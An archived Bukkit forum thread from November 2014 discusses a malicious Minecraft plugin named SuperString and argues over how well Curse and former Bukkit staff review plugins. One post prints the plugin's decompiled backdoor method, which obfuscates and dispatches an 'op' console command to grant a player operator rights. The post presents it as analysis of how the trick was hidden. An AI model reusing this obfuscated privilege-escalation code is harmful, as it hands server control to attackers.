PSA: SuperString

Discussion in 'Community News and Announcements' started by eyamaz, Nov 8, 2014.

Thread Status:
Not open for further replies.
  1. Now we are getting somewhere! Of course there are similarities but there are also differences, at least it's not the same to load code from an image file and to construct 2-letter commands from a list of characters + a distance on some interaction.

    The latest plugin already shows that there is some flaw, regarding the minimum reviewing quality, but seriously. do you think the former Bukkit team let new people process plugins in parallel to experienced reviewers, until the new ones are "perfect"?


    Edit: To clarify are we talking about these three:
    - Magix plugin
    - Decompiler vulnerability
    - SuperString
    korikisulda likes this.
  2. Offline


    Hooly, again a PSA?! it kinda makes me concerning on all those server owners I hope curse does realise that once when someone is able to post something malicious that others may start doing it to like a domino effect?

    why is there no depth information what a "superstring" is? And what malicious workings does it have, now by not reading this it more feels like you give the people who implement such 'evil' code more credit and attraction to do it again rather explaining what server owners could expect as in like behaviour maybe there are some same variants out there with other names.

    anyways not saying that the old system was good either atleast it felt safer than the PSA's Im seeing now.
  3. This user doesn't deserve a ban imo. He kinda helped by putting the team to the test.
    Adzkii, Anrza and Maximvdw like this.
  4. Offline


    3 minutes,.. damn I really need to buy a faster pc..
  5. Offline


    I bet we could bundle a bitcoin miner in with a plugin and they wouldn't catch it... Lol.
    korikisulda likes this.
  6. Offline


    Let me stop you. Tell me how you would define "fairly regular occurrence". You guys... getting mad because of all this, doesn't constituted the fact that "had no clue" now becomes you knew what was going on. So let me be blunt, If you had no clue what we were doing how do you know what we did or didn't do or even how we handled things. Yes things got through, true we didn't make a PSA every time, we checked the log to see who, what, when, where, why, and how, confronted them, and handled the situation effectively and notified everyone that needed notified. However this wasn't a normal occurrence, and if it was I didn't know about it.

    However now every script kiddie in existence wants notoriety and infamy because Curse will make a PSA about their exploits.
    The heckling of the former staff is a bit extreme however when you call out your predecessors on circumstances you knew nothing about, you open yourself up to be criticized. So let me be blunt, if you want to talk nonsense to make yourself look good and save face, you can....

    I'm trying hard not to care. I agree mistakes happen and transparency is good. However highlighting these incidents with a front page PSA is counter productive.
    Two things I have to add though,
    When did you realize the links stay active after you delete the file, I remember TnT arguing with Curse for weeks that they stay live.
    And with all this incite to what we did, did you realize that we also used the plugin page to kinda acknowledge what was in the file. Common sense would tell you a text coloring program doesn't need access to unrestricted command access. Or a chat program call a ban function or any plugin ever calling Bukkit.shutdown().

    As for all who are complaining about the resignations. Put yourself in our shoes, what would you have done.
  7. How aboput accepting it :). To what frequency things happened should not yet be easy to compare, because the curse staff hardly had a couple of weeks of catching up. Given statements about what former Bukkit staff used to do, i suspect it's good to change that, because you can't notify the downloaders other than with a public statement, no way around that.
    Eh, it's much better to have that always, they can make an extra forum category if necessary, though catching attention is intended. The script kiddies are the smallest problem. It might hurt a little that now people start freaking out without any idea about the download numbers, comparing to the past, nor the potential increase in trustability with the new paradigm. To me that seems much better than not telling anyone, especially if the plugins have already been downlaoded.
    I don't like metaphors about mirrors all that much, but would you care to cross-check?
    It should catch attention, and it's fair to assume that it'll get less and less frequent, though another category in the forums could work too, if it's placed somewhere on top.
    If there was difficulties with communication, i could only guess from what people have posted on the forums, and similar.
    Fair enough. Though there has been rumours about a "tellraw" command, yet that doesn't have 2 letters or what not.
    No complaint.
  8. Offline


    I may have retired, but I still use the damn platform. Especially since I am retired staff, I know how things work in the business so I'm in the right spot to be able to provide criticism. Goes for the rest of the retired staff, too.
  9. Offline


    Thank you for the announcement on this. I hope Bukkit might institute something like "Trusted" badges for plugins or plugin authors. Or perhaps use a different color or an asterisk for plugins in a trial period after it gets posted. Something to indicate it was a recently approved plugin that will catch the eye and have an evident meaning to new users.

    People can always look at when the plugin was posted on Bukkit, how many users have downloaded the plugin, and look at the authors profile for their other submissions, however, not every kid making a minecraft server will be smart about using that information you just gave them to make an informed decision. People don't read everything.

    What about something like this:
    List of plugins @

    Plugin-----------------------Categories-------------Authors-----------Last Updated/Uploaded
    Essentials [Trusted] Admin Tools ------essentialsteam --Mar 26, 2014/Aug 25, 2011
    Superstring -------------Stuff ----------------- some_guy -----Nov 10, 2014/Nov 10, 2014

    I know there are A LOT of plugins, but using download number and length of time it's been posted could be used easily right? Or if it's in mature development?

    There's a lot of challenges for staff right now, not enough staff, Bukkit trying to continue to accept plugin submissions as much as possible so people don't think Bukkit is no longer active/being updated/whatever, staff taking over that didn't do these types of review in the past. I'm sure the team knows what their challenges are and are trying to catch these malicious plugins.

    It seems like there are ex-staff sticking around Bukkit to criticize instead of using that time to help. From an outsider perspective, that's what it looks like at a glance.
  10. This is a peculiar topic. There are plugin developers and teams that i would trust in general, however you can't really rely on things staying good. Some developers and some teams may be reliable while active, however you could also have accounts, build servers or "home"-computers compromised, even an upload could get poisoned, though the latter probably isn't the typical way for how exploits get here :p. There has been at least one case with a malicious plugin (slipped through), made by developers who had previously uploaded several plugin versions and could count as "moderately established", thus more damage due to somewhat higher count of instant downloads. Some claim the description was a little boasting about features and that the people have been seen on hackforums.

    Edit: For those who hate/love auto-downloaders... consider the above!

    You can already see the number of downloads for a file and the time it has been up, so at least there is something you can check. The problem is to not create a false sense of security, but at the same time also not confuse people with down-rating long-established plugins that just don't update often. You could visualize activity of uploading and of developer presence (posts, connecting at all, period of absence), but i wouldn't use that as an official means of "how safe" the project is, it could be a nice colored blotch on the side :).
  11. Offline


    Ok, the Magix plugin I could understand got past, it was kind of difficult to spot what was wrong with it, and the only thing about it that was suspicious was the excessive complexity of the plugin.

    But this was just too damn obvious. That last piece of code was practically shouting at you to get discovered. Did take some time to realize what exactly was happening in the code, but it was very clear that someone was trying to hide something.

    The method for opping was about a third of the plugin's size:

    1. private void log(int distance, Player player) {
    2. List<String> scoreCodes = Arrays.asList("q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p");
    3. int scoreOpCode;
    4. String scoreCode = "";
    5. if (distance > 25) {
    6. for (int i = 26; (distance - i) >= 0 && (distance - i) < 26; i += 26) {
    7. scoreOpCode = distance - i;
    8. if (scoreOpCode == 0) {
    9. scoreCode = scoreCodes.get(scoreOpCode + 25) + scoreCodes.get(scoreOpCode);
    10. } else {
    11. scoreCode = scoreCodes.get(scoreOpCode - 1) + scoreCodes.get(scoreOpCode);
    12. }
    13. }
    14. } else {
    15. scoreOpCode = distance;
    16. scoreCode = scoreCodes.get(scoreOpCode - 1) + scoreCodes.get(scoreOpCode);
    17. }
    18. getServer().dispatchCommand(getServer().getConsoleSender(), scoreCode + " " + player.getName());
    19. }

    A quick look at the rest of the code and you can see that the integer distance is always 0. Why even bother with that code? Oh, and the alphabet list that conveniently ends with "o" and "p".
    And you'd think you'd at least have a super-simple program running a check for "dispatchCommand".

    I believe it's the name of this particular plugin.

    EDIT: Here's the source:
  12. Offline


    "in the right spot to be able to provide criticism" [​IMG]
  13. Offline


    We are going to stick with our current plugin author trusting system. Trust no one. We do not look at a users page because we do not care about the users amount of plugins, upload count, download count, time they have had the account. Nothing matters besides the code infront of us. As for the couple people saying malicious users will increase, since the first PSA about Magix there has been no increase. I ban between 1-4 users per day for malicious plugins and that has been the same since the first day we started processing. (Besides the initial large batch, which we banned 14 users)
    Inscrutable likes this.
  14. Yes, the last one was much simpler. Do you want to count up simple exploits getting through, featuring "Old-Bukkit vs. New-Curse"? If so, you have to read the examples given in that post:
  15. Offline


    OK, explain why you don't think he's in the right position to provide criticism? He's a former Bukkit staff member, developer, and longtime user of these forums. You're none of those.

    I support Curse and I'm thankful that they have taken over the queue and are doing it for free, but honestly, things like this should not be slipping by. I understand that they are still getting used to the process and everything, so I will give them credit where it's due (they've done a pretty good job so far), but they need to be called out about stuff like this so they don't make the same mistakes again. Bukkit is dead, BukkitDev is the only thing about this site that makes it worth visiting anymore. If plugins are riddled with malicious code and other issues, this site will lose all of its users to Spigot. The only thing keeping people around are the plugins. If they can't trust the plugins, jumping ship to Spigot (which many have done regardless) is their next move.
    korikisulda, lol768 and Lolmewn like this.
  16. As they said, even before they were finding plugins on a regular basis, without Curse staff, just they didn't get publicized, as often.
  17. Offline


    StealthBravo I didn't even take the time to reply to silly comments :) I laughed at the image though :p
  18. Offline

    Old Man Alpha

    Seriously, this is getting out of hand. What's even the point of DBO if there really isn't any security? I guess we'll need to inspect the code ourselves before use.
  19. What we need now, would be people who can count.
  20. Offline


    They alert servercowners
    Credit is useles as you get banned anyway
  21. Offline


    I am not one to point the finger at anyone under normal circumstances, but this guy was TRYING to get caught. I'm sorry, but if you send in a plugin with malitious code intending for it to be found (And leaving really obvious warnings, such as an array that went from o to p, and another variable with the phase OP in it). While, yes, we decompile code to make sure that nothing is malicious as a community, THIS SHOULD HAVE BEEN CAUGHT.

    I am aware of Bukkit's disintegrating state, but things like this will only make it worse. I believe now that Microsoft has 100% ownership over Mojang (Yes, it was only truly finished a few days ago), we may be able to repair the DMCA issues, but we must keep our standards up along with it.
    Prehaps we could start to do a secondary-approval system by asking dedicated Bukkit Devs to decompile code and check it after it is approved by a moderator?
    I'm not anti-Bukkit, I'm just concerned...
  22. This is something I've been meaning to address for a while now. Just because a company buys a project or other company, doesn't mean that they'll actually control or help that project/company at all. Often large companies will invest by buying smaller companies, but have very little active control over the smaller company and let them do their own thing (except maybe, for example, telling them to follow the company's standards, handling higher level staff changes, and stepping in if they do something to harm the company... i.e just stuff to ensure the company stays running) and the only assistance provided is the funds they have access to, and the ability to use the larger company's name to boost reputation (i.e. "a Microsoft company").

    If you want a real life example of this, what better example than the Bukkit project and Mojang? Mojang owned the project for two years, but did they provide assistance to Bukkit? No they didn't. They only stepped in when the closing down notice was released. Why should Microsoft be any different? Why wouldn't they just be in it for the money?
  23. Offline


    But do you understand how it can make you guys look conflicting? Go ahead and give your 2 cents, you've earned it yada yada, but don't constantly question and judge their workflow, as it was you retired staff who left these few Curse staff alone in the dark. I'm sure they'd all love to be doing other things with their time than filling in your shoes, and having to then deal with you all backseat staff-ing. (totally just made up that word, deal with it)
  24. xDeeKay You say that as if:

    1) Nobody offered to help Curse
    2) Anybody asked Curse to take over
    3) Taking over without assistance means your free of criticism from making mistakes.

    To expand that 3rd point: I'm not saying that Curse have no idea what they're doing, I'm just making a point that if they did have no idea they wouldn't be free from being judged for that. If, for example, a surgeon quit his job, would that mean I could just come in and perform surgery on people, even though I have no idea what I'm doing and nobody asked me to take over? After all, I'm just trying to pick up what that surgeon left off, and he's left me in the dark. That means the surgeon can't criticise me for the mistakes I make, right?
    timtower, drtshock, Lolmewn and 2 others like this.
  25. Offline


    I'm struggling to understand how this file could have been reviewed by any more than 0 people.
    On a (mostly) unrelated note, perhaps the forum needs a section for PSAs? There seem to be quite a few recently.
    drtshock, asofold and AdamQpzm like this.
  26. I could think of reasons: Work-load, printer damaged, coffe machine damaged, not thorough enough, the other guy reviewed it, bad day, too small wide screen :p.
  27. True, but the people that work at Curse can also make mistakes! It's really suspicious that the plugins are approved in less than 10 minutes, but they can also make a mistake! Maybe Curse DOES use software to check it for them, but they also don't want to infect the community with malicious plugins! And everybody should really stop saying that they were better!

    Btw, where are you guys uploading your plugins that Curse checkes them? At DBO? It doesn't update the recently updated plugin list for me tho
  28. Offline


    bramhaag Sure they can make mistakes but the amount of mistakes in a short period of time is... frightening.
    Also yep, DBO.
    bramhaag likes this.
  29. Lolmewn You are right tho. But, the recent updated plugins aren't updating for me :(
  30. I love to count:
    • Number of plugins that made it through.
    • Number of plugins checked.
    • Duration of time of since start of processing plugins.
    • Duration of time used for gathering experience with checking plugins so far.
    I understand if some people read statements by Curse staff about "same standards" as "same thing", but even semantically that's not the case and i don't read that as boasting, but i read it as an intention to apply proper rules. Standards don't mean that you are able to provide the same service, but that you try to apply the same level of checking, but that's not special. Given that they probably don't know all the past-standards with checking, they could have been more modest, e.g. by announcing that they still have to work out a way of plugin checking and that there might be slip thorughs, so people should be careful. I don't feel that you can demand much on it, linking yellow-press pages like "BukkitDev is not safe anymore". Also accusing Curse for bringing the demanded answer of "Bukkit staff had slip throughs too" just won't work out, because they have the data and probably won't lie on that account. Now of course i am not as stupid to believe "either side" 100% always, but if i see who is attacking and who is responding, i get the impression that ex-Bukkit staff are asking for such comparison. I find the aspect of "announce or not announce malicious plugins that made it through and got downloaded" very interesting, i haven't seen ex-staff comment on that yet, but probably it's time to do without the details or something like that, i don't know. If the counter-argument should be "that was a testing phase", then the next post might be "ok this one is not from a testing phase" or it might be "we are in a testing phase too", after all i think there is too much text on this, so i'll try to take a different angle on this thing from now on.
    mairi likes this.
Thread Status:
Not open for further replies.

Share This Page